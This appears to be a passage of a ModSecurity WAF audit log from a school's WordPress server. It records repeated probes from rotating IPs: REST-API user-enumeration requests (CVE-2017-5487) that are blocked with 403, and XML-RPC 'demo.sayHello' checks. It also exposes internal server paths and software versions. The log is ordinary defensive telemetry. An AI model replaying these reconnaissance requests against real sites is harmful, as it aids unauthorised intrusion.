(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2ef0d07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2ef0d07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442492384177 3203 (- - -) Stopwatch2: 1747442492384177 3203; combined=1386, p1=468, p2=886, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2ef0d07-Z-- --8a8b8978-A-- [17/May/2025:07:41:33 +0700] aCfbPXyxdQCiyU1ENFcnJAAAAA8 103.236.140.4 42996 103.236.140.4 8181 --8a8b8978-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a8b8978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a8b8978-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442493871239 2044 (- - -) Stopwatch2: 1747442493871239 2044; combined=1044, p1=330, p2=687, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a8b8978-Z-- --cf34b814-A-- [17/May/2025:07:41:36 +0700] aCfbQBKi5m5upc8uMd6h1QAAAMw 103.236.140.4 43002 103.236.140.4 8181 --cf34b814-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cf34b814-C-- demo.sayHello --cf34b814-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf34b814-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442496417830 5023 (- - -) Stopwatch2: 1747442496417830 5023; combined=3843, p1=476, p2=3150, p3=28, p4=24, p5=95, sr=66, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf34b814-Z-- --685eb840-A-- [17/May/2025:07:41:38 +0700] aCfbQnyxdQCiyU1ENFcnJgAAABQ 103.236.140.4 43004 103.236.140.4 8181 --685eb840-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --685eb840-C-- demo.sayHello --685eb840-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --685eb840-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442498260736 6346 (- - -) Stopwatch2: 1747442498260736 6346; combined=4623, p1=623, p2=3762, p3=39, p4=42, p5=94, sr=92, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --685eb840-Z-- --cf6fa318-A-- [17/May/2025:07:41:39 +0700] aCfbQ3yxdQCiyU1ENFcnJwAAABU 103.236.140.4 43006 103.236.140.4 8181 --cf6fa318-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cf6fa318-C-- demo.sayHello --cf6fa318-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf6fa318-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442499464234 4759 (- - -) Stopwatch2: 1747442499464234 4759; combined=3665, p1=442, p2=3023, p3=24, p4=27, p5=88, sr=71, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf6fa318-Z-- --5f3a9024-A-- [17/May/2025:07:41:40 +0700] aCfbRHyxdQCiyU1ENFcnKAAAABY 103.236.140.4 43010 103.236.140.4 8181 --5f3a9024-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f3a9024-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f3a9024-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442500063786 1876 (- - -) Stopwatch2: 1747442500063786 1876; combined=876, p1=303, p2=547, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f3a9024-Z-- --902d8f49-A-- [17/May/2025:07:41:46 +0700] aCfbSnyxdQCiyU1ENFcnKwAAAAI 103.236.140.4 43018 103.236.140.4 8181 --902d8f49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --902d8f49-C-- demo.sayHello --902d8f49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --902d8f49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442506866361 5773 (- - -) Stopwatch2: 1747442506866361 5773; combined=4068, p1=539, p2=3284, p3=38, p4=44, p5=98, sr=69, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --902d8f49-Z-- --5c18891f-A-- [17/May/2025:07:41:50 +0700] aCfbThKi5m5upc8uMd6h1gAAAM0 103.236.140.4 43022 103.236.140.4 8181 --5c18891f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5c18891f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c18891f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442510499765 2103 (- - -) Stopwatch2: 1747442510499765 2103; combined=1030, p1=344, p2=660, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c18891f-Z-- --49a39214-A-- [17/May/2025:07:41:52 +0700] aCfbUHyxdQCiyU1ENFcnLgAAAAc 103.236.140.4 43026 103.236.140.4 8181 --49a39214-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --49a39214-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49a39214-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442512724319 2004 (- - -) Stopwatch2: 1747442512724319 2004; combined=1009, p1=320, p2=660, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49a39214-Z-- --84c2b033-A-- [17/May/2025:07:41:56 +0700] aCfbVHyxdQCiyU1ENFcnMAAAAAo 103.236.140.4 43032 103.236.140.4 8181 --84c2b033-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --84c2b033-C-- demo.sayHello --84c2b033-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --84c2b033-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442516158729 6092 (- - -) Stopwatch2: 1747442516158729 6092; combined=4733, p1=605, p2=3824, p3=98, p4=43, p5=98, sr=79, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84c2b033-Z-- --ccc33203-A-- [17/May/2025:07:42:00 +0700] aCfbWHyxdQCiyU1ENFcnMwAAABA 103.236.140.4 43038 103.236.140.4 8181 --ccc33203-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ccc33203-C-- demo.sayHello --ccc33203-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ccc33203-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442520201074 4243 (- - -) Stopwatch2: 1747442520201074 4243; combined=3327, p1=422, p2=2728, p3=21, p4=22, p5=79, sr=64, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ccc33203-Z-- --ece8f102-A-- [17/May/2025:07:42:14 +0700] aCfbZnyxdQCiyU1ENFcnNQAAAA8 103.236.140.4 43042 103.236.140.4 8181 --ece8f102-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ece8f102-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ece8f102-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442534760527 3016 (- - -) Stopwatch2: 1747442534760527 3016; combined=1375, p1=458, p2=887, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ece8f102-Z-- --fc7eb661-A-- [17/May/2025:07:42:23 +0700] aCfbb3yxdQCiyU1ENFcnNgAAABI 103.236.140.4 43046 103.236.140.4 8181 --fc7eb661-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc7eb661-C-- demo.sayHello --fc7eb661-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc7eb661-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442543022453 6577 (- - -) Stopwatch2: 1747442543022453 6577; combined=4764, p1=609, p2=3910, p3=40, p4=44, p5=97, sr=82, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc7eb661-Z-- --9df0b051-A-- [17/May/2025:07:45:22 +0700] aCfcInyxdQCiyU1ENFcnOQAAABg 103.236.140.4 43066 103.236.140.4 8181 --9df0b051-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9df0b051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9df0b051-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442722889656 3137 (- - -) Stopwatch2: 1747442722889656 3137; combined=1346, p1=459, p2=857, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9df0b051-Z-- --fe711b5b-A-- [17/May/2025:07:45:31 +0700] aCfcK3yxdQCiyU1ENFcnOgAAAAA 103.236.140.4 43070 103.236.140.4 8181 --fe711b5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe711b5b-C-- demo.sayHello --fe711b5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe711b5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442731202653 5097 (- - -) Stopwatch2: 1747442731202653 5097; combined=3884, p1=488, p2=3189, p3=26, p4=27, p5=91, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe711b5b-Z-- --f4255275-A-- [17/May/2025:07:54:21 +0700] aCfePXyxdQCiyU1ENFcnTwAAABY 103.236.140.4 43158 103.236.140.4 8181 --f4255275-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f4255275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4255275-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443261753624 3419 (- - -) Stopwatch2: 1747443261753624 3419; combined=1418, p1=485, p2=900, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4255275-Z-- --d6a27b6b-A-- [17/May/2025:07:54:30 +0700] aCfeRnyxdQCiyU1ENFcnUAAAABg 103.236.140.4 43162 103.236.140.4 8181 --d6a27b6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d6a27b6b-C-- demo.sayHello --d6a27b6b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6a27b6b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443270273880 6521 (- - -) Stopwatch2: 1747443270273880 6521; combined=4736, p1=611, p2=3879, p3=42, p4=42, p5=97, sr=96, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6a27b6b-Z-- --41c5081a-A-- [17/May/2025:07:55:35 +0700] aCfeh3yxdQCiyU1ENFcnUgAAABc 103.236.140.4 43166 103.236.140.4 8181 --41c5081a-B-- GET 